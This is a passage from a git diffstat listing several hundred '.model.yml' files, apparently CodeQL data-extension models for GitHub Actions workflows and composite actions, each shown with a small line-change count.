+- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 ++-- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 ++-- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 ++-- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 ++-- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 ++-- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 ++-- .../ext/manual/8398a7_action-slack.model.yml | 2 +- .../manual/AsasInnab_regex-action.model.yml | 2 +- .../ext/manual/MeilCli_regex-match.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- .../Steph0_dotenv-configserver.model.yml | 2 +- ...us_github-action-files-in-commit.model.yml | 2 +- .../manual/aarcangeli_load-dotenv.model.yml | 2 +- .../ab185508_file-type-finder.model.yml | 2 +- ...ons-ecosystem_action-regex-match.model.yml | 2 +- .../manual/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- .../manual/akefirad_loadenv-action.model.yml | 2 +- .../manual/akhileshns_heroku-deploy.model.yml | 4 ++-- ...bell_pull-request-comment-branch.model.yml | 2 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- .../ext/manual/anchore_sbom-action.model.yml | 2 +- .../ext/manual/anchore_scan-action.model.yml | 2 +- .../andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- .../ankitjain28may_list-files-in-pr.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- .../ext/manual/appleboy_ssh-action.model.yml | 2 +- ql/lib/ext/manual/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...aamMavridis_files-changed-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/manual/azure_cli.model.yml | 2 +- ql/lib/ext/manual/azure_powershell.model.yml | 2 +- .../ext/manual/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- .../manual/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 ++-- .../manual/bufbuild_buf-lint-action.model.yml | 4 ++-- .../bufbuild_buf-setup-action.model.yml | 2 +- .../c-py_action-dotenv-to-setenv.model.yml | 2 +- .../ext/manual/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/manual/changesets_action.model.yml | 2 +- .../cloudflare_wrangler-action.model.yml | 2 +- .../cosq-network_dotenv-loader.model.yml | 2 +- .../manual/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- .../manual/cypress-io_github-action.model.yml | 2 +- .../dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- .../manual/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- .../devorbitus_yq-action-output.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- .../manual/docker_build-push-action.model.yml | 2 +- ...3d_action-extract-unique-matches.model.yml | 2 +- .../manual/eficode_resolve-pr-refs.model.yml | 2 +- ql/lib/ext/manual/endbug_latest-tag.model.yml | 2 +- .../manual/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- .../manual/gabrielbb_xvfb-action.model.yml | 2 +- .../manual/game-ci_unity-builder.model.yml | 2 +- .../game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- .../manual/getsentry_action-release.model.yml | 2 +- .../ext/manual/github_codeql-action.model.yml | 2 +- .../go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...tson_pull-request-comment-branch.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../gradle_gradle-build-action.model.yml | 2 +- .../manual/haya14busa_action-cond.model.yml | 2 +- .../manual/hexlet_project-action.model.yml | 2 +- .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/manual/ilammy_setup-nasm.model.yml | 2 +- .../ext/manual/imjohnbo_issue-bot.model.yml | 2 +- .../ext/manual/iterative_setup-cml.model.yml | 2 +- .../ext/manual/iterative_setup-dvc.model.yml | 2 +- 